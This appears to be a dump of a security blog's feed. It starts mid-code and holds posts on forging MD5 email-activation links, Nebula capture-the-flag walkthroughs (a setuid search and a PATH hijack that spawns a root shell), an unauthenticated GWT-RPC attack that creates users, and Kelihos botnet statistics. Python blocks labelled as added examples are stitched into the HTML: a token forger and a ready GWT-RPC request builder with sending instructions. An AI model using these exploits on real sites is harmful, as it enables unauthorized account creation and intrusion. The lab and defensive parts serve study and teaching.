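            UPPER, UPPER, SPECIAL, LOWER, LOWER, SPECIAL, range(100)):
        yield f"{u1}{u2}{s1}{l1}{l2}{s2}{n}"


def seconds_to_exhaust(guesses_per_second):
    """Worst-case duration of an online attack at an assumed guess rate."""
    return keyspace() / guesses_per_second


if __name__ == "__main__":
    print("all samples match:", all(matches_pattern(p) for p in SAMPLES))
    print(f"keyspace: {keyspace():,}")
    print(f"wordlist: {wordlist_bytes() / 1e9:.1f} GB")
    print(f"at 10 guesses/s: {seconds_to_exhaust(10) / 86400 / 365:.1f} years")
    print("first candidates:", list(itertools.islice(candidates(), 3)))
```

At ten guesses per second the full space takes about five years, which is why the pattern is an online-attack nuisance rather than a break; a leak of the generator's seed or any bias in it would change that picture immediately.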
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-82299072906115096232012-06-02T21:33:00.003+02:002012-06-03T12:41:13.465+02:00How to NOT generate confirmation links<div style="text-align: justify;">
Today I registered an account on some company's website. As usual I got a confirmation e-mail with a link to click so that my account would be activated. It looked like this:</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: 0px; margin-right: 0px; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT4lJHUmv0DZPsJMJ6F0A_0_zDzIbLqFX8UPKKW-82oAN5pt01Pjzwc4e4SzwfbjFdNgoxnal2t5i2XqVVAB-adWInISYa5XCP-JJ4H2EE0OaiPSQ5G_k9aS7w_c8i_Iuir5IKVyOEgOE/s1600/act_link.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT4lJHUmv0DZPsJMJ6F0A_0_zDzIbLqFX8UPKKW-82oAN5pt01Pjzwc4e4SzwfbjFdNgoxnal2t5i2XqVVAB-adWInISYa5XCP-JJ4H2EE0OaiPSQ5G_k9aS7w_c8i_Iuir5IKVyOEgOE/s1600/act_link.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">part of the activation e-mail I received.</td></tr>
</tbody></table>
<div style="text-align: justify;">
So my first thought was to check this MD5 hash! :)</div>
<div style="text-align: justify;">
Using Google I quickly got an answer:</div>
<br />
<div style="text-align: justify;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsSDAgyk9hUoYXKrcevWCoWV0UUKRjdP864OBEJ-fNt0dR5vyV2zUZRHlty7m4vRZfFLvM2x5z2wSqA2F9I220pDvfeORbmtL6kOwf6rN2o29jX2JsyozZa_8WxRJeHOlJ8GQ6b-Uy2lE/s1600/md5hash.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsSDAgyk9hUoYXKrcevWCoWV0UUKRjdP864OBEJ-fNt0dR5vyV2zUZRHlty7m4vRZfFLvM2x5z2wSqA2F9I220pDvfeORbmtL6kOwf6rN2o29jX2JsyozZa_8WxRJeHOlJ8GQ6b-Uy2lE/s400/md5hash.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">md5 hash and the source string.</td></tr>
</tbody></table>
<br />
Hm, interesting: it looks like the hash is the MD5 of the string 'mw' + login. Let's verify this.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The first step is creating an account with a non-existent e-mail address.</div>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRjTxSri9ydwDXwz7iZgaLNw_bw6a0G9lHP08HmSlvQ-QBHZf2maW5kSem2FIGDDjtokplr7IWRx6cjhOsWpBVz8HbWl-1vBrKxk3aDyW7g4lmd1qbbqZEvjSBJCJceQEN7cE2lYAG3-0/s1600/register.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="267" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRjTxSri9ydwDXwz7iZgaLNw_bw6a0G9lHP08HmSlvQ-QBHZf2maW5kSem2FIGDDjtokplr7IWRx6cjhOsWpBVz8HbWl-1vBrKxk3aDyW7g4lmd1qbbqZEvjSBJCJceQEN7cE2lYAG3-0/s320/register.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">our fake input data.</td></tr>
</tbody></table>
<br />
Next we generate the MD5 hash of the string 'mwthisisfake' and paste the crafted URL into the browser.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-left: 0px; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWV-SUpRa6TCfb-DZDD7V8VM4QJnm7wt5XgX7C7YdeVqm7pV7vH2_zULGka8rqWb88v_FSVy66tjbPq9IlFD-4wX-ct-Ko3RgmPVCYHn95m8ACbnu9nEqLwVPmIvGagAYD7PW5o6DSj8/s1600/act_link2.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDWV-SUpRa6TCfb-DZDD7V8VM4QJnm7wt5XgX7C7YdeVqm7pV7vH2_zULGka8rqWb88v_FSVy66tjbPq9IlFD-4wX-ct-Ko3RgmPVCYHn95m8ACbnu9nEqLwVPmIvGagAYD7PW5o6DSj8/s1600/act_link2.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">confirmation link generated by us.</td></tr>
</tbody></table>
<br />
Success!<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TsVSrxr3csMmS7jgpXVrgzTuTIht8S-2vCpAGTACKUM6EDcMIadBt3ba0DPPDrcOmI0V2KUXCysLdQk9ZRnKoAx5A3ZYnhD94HoVOLAm_DKYKQljIVh06ykgPwiSzT1wYIPclemqIY8/s1600/dziekujemy.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5TsVSrxr3csMmS7jgpXVrgzTuTIht8S-2vCpAGTACKUM6EDcMIadBt3ba0DPPDrcOmI0V2KUXCysLdQk9ZRnKoAx5A3ZYnhD94HoVOLAm_DKYKQljIVh06ykgPwiSzT1wYIPclemqIY8/s1600/dziekujemy.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Registration confirmation info.</td></tr>
</tbody></table>
<br />
So let's see if we can log in.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWiVJcv2UOvpTmR5L4o-gssnXW51kbS9j-v15ExHzkvF7D74HGl0jvRBU60pv8o7WuwithNW7R73g30alDdITwwSqVbVVgnFFH5NvVE7Glt1DvZSMKtMccvO4Tr44GPbFAV3TAx9-PWWY/s1600/logged.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWiVJcv2UOvpTmR5L4o-gssnXW51kbS9j-v15ExHzkvF7D74HGl0jvRBU60pv8o7WuwithNW7R73g30alDdITwwSqVbVVgnFFH5NvVE7Glt1DvZSMKtMccvO4Tr44GPbFAV3TAx9-PWWY/s1600/logged.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Logged in as thisisfake user.</td></tr>
</tbody></table>
<br />
OK, so I managed to skip the e-mail verification. What is so bad about that?<br />
<br />
The first obvious conclusion is that users can create accounts without a valid e-mail address. It is also easier to write a script for automatic account creation (no e-mail, no CAPTCHA verification). User login enumeration is possible too. This is just a registration confirmation link; imagine what would happen if the password reset function had this vulnerability (and I have seen that happen before). I'll try to continue on this topic if I find more interesting examples.<br />
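The forgery above, and what the site should have done instead, as an added example in Python (not the site's code; the activation URL layout is assumed, since the post only shows the hash): the first function reproduces the token for any login, the rest show two hardened alternatives, a random single-use token stored server-side and an HMAC keyed with a secret that never leaves the server.

```python
import hashlib
import hmac
import secrets

# Token construction recovered in the post: md5("mw" + login).
STATIC_PREFIX = "mw"
ACTIVATION_URL = "https://example.invalid/activate?token="   # assumed layout


def forge_activation_token(login):
    """Reproduce the site's activation token for any login; no secret needed."""
    return hashlib.md5((STATIC_PREFIX + login).encode()).hexdigest()


def forge_activation_link(login):
    """Craft the link the victim would have received (parameter name assumed)."""
    return ACTIVATION_URL + forge_activation_token(login)


class PendingActivations:
    """Hardened variant 1: a random single-use token kept server-side.
    In-memory registry for illustration; a real site would persist it with an expiry."""

    def __init__(self):
        self._tokens = {}                       # login -> outstanding token

    def issue(self, login):
        token = secrets.token_urlsafe(32)       # 256 bits from the OS CSPRNG
        self._tokens[login] = token
        return token

    def confirm(self, login, token):
        expected = self._tokens.get(login)
        if expected is None:
            return False
        if not hmac.compare_digest(expected, token):   # constant-time compare
            return False
        del self._tokens[login]                 # one confirmation per token
        return True


def keyed_token(login, server_key):
    """Hardened variant 2 (stateless): HMAC-SHA256 over the login with a key
    that never leaves the server, so the value cannot be derived from the login."""
    return hmac.new(server_key, login.encode(), hashlib.sha256).hexdigest()


def verify_keyed_token(login, token, server_key):
    """Constant-time check of a keyed token presented by the client."""
    return hmac.compare_digest(keyed_token(login, server_key), token)


if __name__ == "__main__":
    print(forge_activation_link("thisisfake"))
    registry = PendingActivations()
    issued = registry.issue("thisisfake")
    print(registry.confirm("thisisfake", issued), registry.confirm("thisisfake", issued))
```

The keyed variant is the minimum fix; in practice the MAC should also cover an expiry timestamp, and the random stored token is preferable because it can be revoked and used exactly once.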
<br />
<div style="text-align: justify;">
</div>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-33238100881851476092012-04-10T21:15:00.002+02:002012-04-10T21:15:41.634+02:00exploit-exercises.com walkthrough - Nebula level01<span style="font-family: inherit;">Here's the vulnerable source code:</span><br />
<pre style="white-space: pre-wrap; word-wrap: break-word;">#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  /* copy the effective (setuid) ids into the real ids as well */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* env is called by absolute path, but "echo" is looked up through $PATH */
  system("/usr/bin/env echo and now what?");
}</pre>
The binary is located at /home/flag01/flag01. When executed it simply echoes the "and now what?" message. It is easy to spot that env is called with an absolute path, but echo is not: /usr/bin/env resolves it through the PATH variable inherited from our shell, so we can make it run our own echo. We do this by creating a simple C program in /home/level01:<br />
<pre style="white-space: pre-wrap; word-wrap: break-word;">#include <stdlib.h>
#include <stdio.h>

/* saved as 1.c; compiled to a binary named "echo" so env picks it up first */
int main(void)
{
    system("/bin/bash");
    return 0;
}</pre>
Now we need to compile it:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">level01@nebula:~$ gcc -o echo 1.c</span></blockquote>
In the next step we will alter the PATH variable value with the following command:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">level01@nebula:~$ PATH=/home/level01:$PATH</span></blockquote>
All we need to do now is run /home/flag01/flag01.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFdDjpq6ZmqIq5XoZpfM6cp0Nds8OThFoiXVTHjrIDeW_SG09Ly_9eBuge1ySClbCB7ceDXWDSdzUODxKOA47e94R-XXuUL7Do5e3Zd-U3UquoB29u_wgYkteHquAsVSNRYlOcexhJbhc/s1600/Bez%C2%A0tytu%C5%82u.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFdDjpq6ZmqIq5XoZpfM6cp0Nds8OThFoiXVTHjrIDeW_SG09Ly_9eBuge1ySClbCB7ceDXWDSdzUODxKOA47e94R-XXuUL7Do5e3Zd-U3UquoB29u_wgYkteHquAsVSNRYlOcexhJbhc/s320/Bez%C2%A0tytu%C5%82u.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level01 completed.</td></tr>
</tbody></table>
<br />
That's it!Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com3tag:blogger.com,1999:blog-4014979627879654228.post-85310020203966035352012-03-22T18:35:00.001+01:002012-03-22T18:35:09.299+01:00[fun] Google Street View in PolandJust browsing Street View around my neighbourhood, I found this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFGkmF-P9CCEYw4Q9gbOupdSLarrYOygpVclyKkF5wQMtbFye8RvFlIzf_dREzl5aAtJpwc3tg0yW6em8tSR5LzTudKH4_xnU_thun_4hUDT9tnBxvEWUi0HYFmTPWe-F3rgENBHVl0cc/s1600/google_street_pl.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFGkmF-P9CCEYw4Q9gbOupdSLarrYOygpVclyKkF5wQMtbFye8RvFlIzf_dREzl5aAtJpwc3tg0yW6em8tSR5LzTudKH4_xnU_thun_4hUDT9tnBxvEWUi0HYFmTPWe-F3rgENBHVl0cc/s320/google_street_pl.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Graffiti censorship by Google :)</td></tr>
</tbody></table>
Face recognition algorithm fail? :DPawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-12174089275298801432012-03-07T21:25:00.005+01:002012-07-19T08:55:45.548+02:00GWT Web App Hacking<span style="font-size: large;">Intro</span><br />
Recently I was performing a black-box test of a web application. After initial reconnaissance I found nothing interesting; basically it was just a login screen... so I started WebScarab and sent some random credentials.<br />
This is what i saw:<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPqaWTOP2Noz9zqzMTumyV-uNmts2af60L7Eyy7ce5KJrvrYP1q86GkHu4bdEx7kps-AqPdhYqE9jZqDiEhjqR066-uVjBsEzGnl7yK36oS397oQfVS2YcViY_iCoYXOFqyJc5nz1LJ6s/s1600/1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPqaWTOP2Noz9zqzMTumyV-uNmts2af60L7Eyy7ce5KJrvrYP1q86GkHu4bdEx7kps-AqPdhYqE9jZqDiEhjqR066-uVjBsEzGnl7yK36oS397oQfVS2YcViY_iCoYXOFqyJc5nz1LJ6s/s320/1.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">RPC Call authenticating user</td></tr>
</tbody></table>
This request is a GWT (Google Web Toolkit) RPC call. For a better understanding of the subject I highly recommend reading <a href="http://blog.gdssecurity.com/labs/2009/10/8/gwt-rpc-in-a-nutshell.html" target="_blank">this</a> great article. It will be really helpful when we want to modify calls or send our own based only on a method definition.<br />
<br />
<span style="font-size: large;">Enumeration</span><br />
I mentioned method definitions above; we need to retrieve them from a JavaScript file (usually obfuscated). The file has "nocache" in its name and you will find its URL in the page source. To extract the definitions we will use a tool called gwtenum from the <a href="https://github.com/GDSSecurity/GWT-Penetration-Testing-Toolset" target="_blank">GWT-Penetration-Testing-Toolset</a>.<br />
<br />
<blockquote class="tr_bq">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">python gwtenum.py -u "https://example.com/xx.nocache.js"</span></blockquote>
As a result we get about 50 methods, for example:<br />
<pre class="brush:java;"> DataService.ChangePass( java.lang.String/2004016611, ... ) *
DataService.DeleteUser( java.lang.String/2004016611 )
DataService.addUser( ... ) *
DataService.getFirms( )
</pre>
* Dots indicate a longer list of parameters.<br />
Now it gets interesting...<br />
What can we do with this knowledge? As seen in the first screenshot, the CheckUser() method was called.<br />
We can try to call other methods from the list; if the application does not check permissions on the server side, we will succeed. Our best bet is the addUser() method, because we want to get in. The first problem is that we don't know the parameter order: for methods like DeleteUser() or getFirms() it is trivial, but addUser() takes 6 parameters, all of type String.<br />
<br />
<span style="font-size: large;">Attack</span><br />
<br />
<span style="font-family: inherit;">Let's start with something easy, like calling getFirms(), as we don't want to delete users from the client's production system :). We intercept the request again with WebScarab and transform the CheckUser call into getFirms().
</span><br />
<br />
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">7|0|4|https://example.com/xx.xyz.Main/|185Bxxx|xx.xx.rpc.DataService|getFirms|1|2|3|4|0|</span></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_GNGwEtZ9wYjavtja0D3cGzrWTCDyjVWH0bxQtRUuWgncaeWAdkL-T5dbhW-OKPvmJTMFz_he0pT8HnngaTJwJ5_L6PRbRT1HsssbMDU9-ivhF5iLPQbxWUE1VHWCj9oIeeqcRyKF8k/s1600/Bez%C2%A0tytu%C5%82u.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC_GNGwEtZ9wYjavtja0D3cGzrWTCDyjVWH0bxQtRUuWgncaeWAdkL-T5dbhW-OKPvmJTMFz_he0pT8HnngaTJwJ5_L6PRbRT1HsssbMDU9-ivhF5iLPQbxWUE1VHWCj9oIeeqcRyKF8k/s320/Bez%C2%A0tytu%C5%82u.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Results of getFirms() call - success !
</td></tr>
</tbody></table>
<br />
We adjusted the parameters of the RPC call (the format is explained in the article linked earlier) so that the server would not throw an exception, and voilà!<br />
<br />
So it is possible to call methods without being authenticated. What about addUser()? Since all parameters are strings, let's just fill them all with the word 'pentest'.<br />
<br />
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;">7|0|7|https://example.com/xx.xyz.Main/|185Bxxx|xx.xx.rpc.DataService|addUser|java.lang.String|/2004016611|S|pentest|1|2|3|4|6|5|5|5|5|5|6|7|7|7|7|7|7|</span>
</div>
<div style="text-align: center;">
<span style="background-color: #444444; font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nBfkPD9LacxHAYZBeXL2FEJwEfXJ3QaPcK4lNVvlHa8xOOxp0xz4GWS3lAvs1uS_0CWv_LOPTcgtgdXV8CXAdX1q2PDNrzTf5PtOv8jtvwjDd708CenBQJzKKtGZoIwFwBhboA19GGE/s1600/3.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0nBfkPD9LacxHAYZBeXL2FEJwEfXJ3QaPcK4lNVvlHa8xOOxp0xz4GWS3lAvs1uS_0CWv_LOPTcgtgdXV8CXAdX1q2PDNrzTf5PtOv8jtvwjDd708CenBQJzKKtGZoIwFwBhboA19GGE/s320/3.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Successful login with user/pass "pentest"!</td></tr>
</tbody></table>
<div style="text-align: left;">
<span style="font-family: inherit;">We managed to create a user on the system remotely and were able to log in!</span></div>
<div style="text-align: left;">
<span style="font-family: inherit;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: inherit;">pwnt.</span></div>
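As an added example (not the toolset's code and not the tested application's), here is a Python builder and decoder for GWT-RPC version 7 request bodies, the format of the two calls above. It reproduces the getFirms() body exactly and builds the addUser() call from the method definition alone. The module URL, strong name and service name are the anonymised values from the captured calls, and the type-signature hash for java.lang.String is the one in the gwtenum output; support is limited to String and primitive arguments, which is all these calls need.

```python
GWT_RPC_VERSION = 7
STRING_TYPE = "java.lang.String/2004016611"   # type signature from the gwtenum output

# Anonymised values from the captured calls in the post.
MODULE_BASE_URL = "https://example.com/xx.xyz.Main/"
STRONG_NAME = "185Bxxx"
SERVICE = "xx.xx.rpc.DataService"


def build_gwt_rpc(module_base_url, strong_name, service_interface, method, params):
    """Serialize a GWT-RPC version 7 request body.

    params is a list of (type_signature, value) pairs.  Every string (URL,
    strong name, service, method, type signatures and String values) goes
    into a deduplicated string table and is referenced by its 1-based index;
    non-String values are written literally, which covers primitives.
    """
    table = []
    index = {}

    def ref(s):
        if s not in index:
            table.append(s)
            index[s] = len(table)
        return index[s]

    header = [ref(module_base_url), ref(strong_name), ref(service_interface), ref(method)]
    types = [ref(sig) for sig, _ in params]
    values = [ref(value) if sig == STRING_TYPE else value for sig, value in params]
    fields = [GWT_RPC_VERSION, 0, len(table)] + table + header + [len(params)] + types + values
    return "|".join(str(f) for f in fields) + "|"


def parse_gwt_rpc(body):
    """Decode a version 7 body back into its parts (inverse of build_gwt_rpc)."""
    fields = body.split("|")[:-1]              # drop the empty field after the last '|'
    n = int(fields[2])
    table, rest = fields[3:3 + n], fields[3 + n:]
    lookup = lambda i: table[int(i) - 1]
    count = int(rest[4])
    types = [lookup(i) for i in rest[5:5 + count]]
    raw = rest[5 + count:5 + 2 * count]
    values = [lookup(v) if t == STRING_TYPE else v for t, v in zip(types, raw)]
    return {
        "version": int(fields[0]),
        "module_base_url": lookup(rest[0]),
        "strong_name": lookup(rest[1]),
        "service": lookup(rest[2]),
        "method": lookup(rest[3]),
        "params": list(zip(types, values)),
    }


def get_firms_call():
    """The no-argument call that first proved methods are callable unauthenticated."""
    return build_gwt_rpc(MODULE_BASE_URL, STRONG_NAME, SERVICE, "getFirms", [])


def add_user_call(value="pentest", arity=6):
    """addUser() takes six String parameters; fill every one of them with value."""
    return build_gwt_rpc(MODULE_BASE_URL, STRONG_NAME, SERVICE, "addUser",
                         [(STRING_TYPE, value)] * arity)


if __name__ == "__main__":
    print(get_firms_call())
    print(add_user_call())
    print(parse_gwt_rpc(add_user_call())["params"])
```

Send the body as the POST payload with Content-Type: text/x-gwt-rpc; charset=utf-8 and the X-GWT-Permutation header copied from the intercepted request. The builder deduplicates the string table the way a real GWT client does, so its addUser() body carries six table entries; when the method list gives you only types, this is the fastest way to get a well-formed call to start guessing the argument order with.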
<br />Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-19774848193389253362012-03-05T11:52:00.001+01:002012-03-05T11:53:02.100+01:00Kelihos botnet - mostly located in PolandA recent post on <a href="https://www.abuse.ch/?p=3658" target="_blank">abuse.ch</a> about the comeback of the Kelihos botnet shows some interesting statistics. Most of the hosts are located in Poland: 279 out of 809, to be specific. Below is a list of large Polish internet providers:<br />
<br />
<ul>
<li>UPC - 91 hosts</li>
<li>Vectra Technologie S.A. - 42</li>
<li>Multimedia Polska Sp. z o.o. - 41</li>
<li>Telekomunikacja Polska S.A. - 38</li>
<li>PTK Centertel Sp. z o.o. - 11</li>
</ul>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wUSBMbCnZupwW9GEBjpJHxWWy1WsJ8JfX4QmilAMep_1wcrwg3LoEXF5fBWV2LN8bynZ_ULzfMKiadCe6HBh-vmbzmaqrrcxvi9P17TiJgSFMYaaFIwDsmAFrMW9WGMTATpdqlMLAss/s1600/kelihos_Botnet_GeoLocation.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9wUSBMbCnZupwW9GEBjpJHxWWy1WsJ8JfX4QmilAMep_1wcrwg3LoEXF5fBWV2LN8bynZ_ULzfMKiadCe6HBh-vmbzmaqrrcxvi9P17TiJgSFMYaaFIwDsmAFrMW9WGMTATpdqlMLAss/s320/kelihos_Botnet_GeoLocation.png" width="284" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Source: <a href="https://www.abuse.ch/?p=3658" target="_blank">abuse.ch</a></td></tr>
</tbody></table>
<div>
<br /></div>Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-89470897865824027322012-02-22T17:48:00.000+01:002012-02-22T18:02:53.778+01:00exploit-exercises.com walkthrough - Nebula level00"exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering." - quote from the project homepage<br />
<div>
<br />
We will start with level00. I assume you already have the Nebula VM and know the rules.</div>
<div>
<br /></div>
<div>
<a href="http://exploit-exercises.com/nebula/level00">http://exploit-exercises.com/nebula/level00</a> - After logging in as the level00 user we follow the hint from the level's page and type the following command:</div>
<blockquote class="tr_bq">
<span style="background-color: #666666;">find / -perm -4000 2> /dev/null</span></blockquote>
and get the results:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKH5oVmJllvnqx_UszGGl-p7z-LFmjs5_Z07_OGP9cWCsJEvPQ5_3sLJIo0TcFxXZ75298ORL9RvGCe9YMC5fpZA6OH3_L3zlmyCZhTtvUIP2zvpfcKHOm1pGJ-FytZV87jQpRjdFDfPs/s1600/find.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKH5oVmJllvnqx_UszGGl-p7z-LFmjs5_Z07_OGP9cWCsJEvPQ5_3sLJIo0TcFxXZ75298ORL9RvGCe9YMC5fpZA6OH3_L3zlmyCZhTtvUIP2zvpfcKHOm1pGJ-FytZV87jQpRjdFDfPs/s320/find.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"/bin/.../flag00" - interesting...</td></tr>
</tbody></table>
so we run:<br />
<blockquote class="tr_bq">
<span style="background-color: #666666;">/bin/.../flag00</span></blockquote>
...and that's it!<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8R9SOtcxz2JvyNMG0UjJKyVCQjZMHrizRmVYU-FlVTEs3xiZ-GheXH9gKL8WCVbCfxtBqenYTKIND4vBbKzFyf5MYv4SWB0LlEUyHDi78h975jIyNawtKoomrkKfhVvRRxMhf262fP8/s1600/done.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT8R9SOtcxz2JvyNMG0UjJKyVCQjZMHrizRmVYU-FlVTEs3xiZ-GheXH9gKL8WCVbCfxtBqenYTKIND4vBbKzFyf5MYv4SWB0LlEUyHDi78h975jIyNawtKoomrkKfhVvRRxMhf262fP8/s320/done.jpg" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level00 completed</td></tr>
</tbody></table>
Stay tuned for next episodes ;)Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0